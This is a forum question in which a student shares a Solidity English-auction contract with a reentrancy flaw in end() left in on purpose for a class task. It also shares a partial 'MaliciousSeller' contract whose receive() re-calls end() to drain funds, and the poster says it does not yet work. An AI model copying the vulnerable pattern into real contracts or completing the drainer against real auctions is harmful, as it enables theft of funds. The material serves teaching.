How to implement a reentrancy attack in the English Auction in Solidity?
I implemented a solidity code for an English Auction where different accounts can bid during the specific period of time to win the nft.
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.25;

interface IERC721 {
    function safeTransferFrom(address from, address to, uint256 tokenId) external;
    function transferFrom(address, address, uint256) external;
}

contract EnglishAuction {
    event Start();
    event End(address highestBidder, uint256 highestBid);
    event Bid(address indexed bidder, uint256 bid);
    event WithDraw(address indexed bidder, uint256 amount);

    IERC721 public nft;
    uint256 public nftId;

    address payable public seller;
    bool public started;
    bool public ended;
    uint256 public endAt;

    uint256 public highestBid;
    address public highestBidder;
    mapping (address => uint256) public bids;

    constructor (address _nft, uint256 _nftId, uint256 _startingBid) {
        nft = IERC721(_nft);
        nftId = _nftId;
        highestBid = _startingBid;
        seller = payable(msg.sender);
    }

    function start() external {
        require(!started, "Already started");
        require(msg.sender == seller, "You are not the seller");

        nft.transferFrom(msg.sender, address(this), nftId);
        started = true;
        endAt = block.timestamp + 60;
    
        emit Start();
    }

    function end() external {
        require(started, "Need to start first");
        require(block.timestamp >= endAt, "Auction is still going");
        require(!ended, "Auction has already finished");

        if (highestBidder != address(0)) {          
            seller.transfer(highestBid);
            nft.safeTransferFrom(address(this), highestBidder, nftId);
        } else {
            nft.safeTransferFrom(address(this), seller, nftId);
        }
        ended = true;

        emit End(highestBidder, highestBid);
    }

    function bid() external payable {
        require(started, "Not started yet");
        require(block.timestamp < endAt, "Auction ended");
        require(msg.value > highestBid, "Value < Highest Bid");

        if (highestBidder != address(0)) {
            bids[highestBidder] += highestBid;
        }

        highestBid = msg.value;
        highestBidder = msg.sender;

        emit Bid(msg.sender, msg.value);
    }

    function withdraw() external payable {
        uint256 bal = bids[msg.sender];
        bids[msg.sender] = 0;
        payable(msg.sender).transfer(bal);

        emit WithDraw(msg.sender, bal);
    }
}

In the end() method I explicitly put the sending of highest bid before the sending of the nft, since I got a task to explain the reentrancy vulnerability of this method which will occur in this case and also to write a malicious contract code to demonstrate stealing of the funds from the auction contract. I've tried to implement the Malicious Contract as a seller with this code:
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.25;


import "./EnglishAuction.sol";

contract MaliciousSeller  {
    EnglishAuction public auction;
    MyNFT public nft;
    address public owner;
    uint256 public tokenId;


    constructor(address _nft, uint256 _tokenId) {
        nft = MyNFT(_nft);
        owner = msg.sender;
        tokenId = _tokenId;
    }

    function deployAuction(uint256 _startingBid) external {
        require(msg.sender == owner, "Only owner can deploy the auction");
        auction = new EnglishAuction(address(nft), tokenId, _startingBid);
    }

    function mintSeller() external {
        require(msg.sender == owner, "Only owner can mint the NFT");
        nft.mint(address(this), tokenId);
    }

    function approveAuction() external {
        require(msg.sender == owner, "Only owner can approve the auction");
        nft.approve(address(auction), tokenId);
    }

    function startAuction() external {
        auction.start();
    }

    function attack() external {
        auction.end();
    }    

    receive() external payable {   
        if (address(auction).balance >= auction.highestBid()) {
            auction.end();
        }
    }


    function deposit() external payable {

    }
}

But it still doesn't work as intended, so I'm looking for some help.
